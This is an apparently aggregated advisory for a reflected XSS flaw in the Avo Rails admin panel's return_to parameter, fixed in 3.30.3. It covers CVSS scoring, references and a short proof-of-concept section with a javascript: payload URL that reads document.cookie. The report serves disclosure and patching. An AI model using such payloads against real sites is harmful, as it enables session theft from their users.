Security Vulnerability Report
CVE-2026-33209 CVSS 6.1 MEDIUM

Published: 2026-03-20 23:16:46
Last Modified: 2026-03-23 18:55:38

Description

Avo is a framework for creating admin panels for Ruby on Rails apps. Prior to version 3.30.3, a reflected cross-site scripting (XSS) vulnerability exists in the return_to query parameter used in the Avo interface. An attacker can craft a malicious URL that injects arbitrary JavaScript, which is executed when the victim clicks a dynamically generated navigation button. This issue has been patched in version 3.30.3.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS 4.0 Score (secondary)
5.3 MEDIUM
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

Configurations (Affected Products)

cpe:2.3:a:avohq:avo:*:*:*:*:*:ruby:*:* - VULNERABLE
Avo < 3.30.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- PoC for CVE-2026-33209: Reflected XSS in Avo return_to parameter
     Usage: Access the vulnerable URL with the payload and click the dynamic button. -->
<!-- Malicious URL Example -->
<!-- https://target.com/avo?return_to=javascript:alert(document.cookie) -->
<script>
// Simulated payload that would be injected via the 'return_to' parameter.
// In a real attack, this is triggered by the UI action (clicking the navigation button).
console.log("[PoC] Attempting to trigger XSS via return_to parameter...");

// The vulnerable component likely constructs a link or button like this:
//   <a href="[USER_INPUT]">Go Back</a>
// where [USER_INPUT] is the unvalidated value of 'return_to'.
var maliciousPayload = "javascript:alert('CVE-2026-33209 XSS Triggered');";

// Hypothetical check: only reports whether the page was loaded with a return_to parameter.
if (window.location.href.includes("return_to")) {
  alert("If you clicked a navigation button and saw an alert, the system is vulnerable.");
}
</script>
```

References

https://github.com/avo-hq/avo/commit/4453d39ddc6309f3bc8ada73ef21e1971112de7d (Patch)
https://github.com/avo-hq/avo/pull/4330 (Issue Tracking, Patch)
https://github.com/avo-hq/avo/releases/tag/v3.30.3 (Product, Release Notes)
https://github.com/avo-hq/avo/security/advisories/GHSA-762r-27w2-q22j (Vendor Advisory)
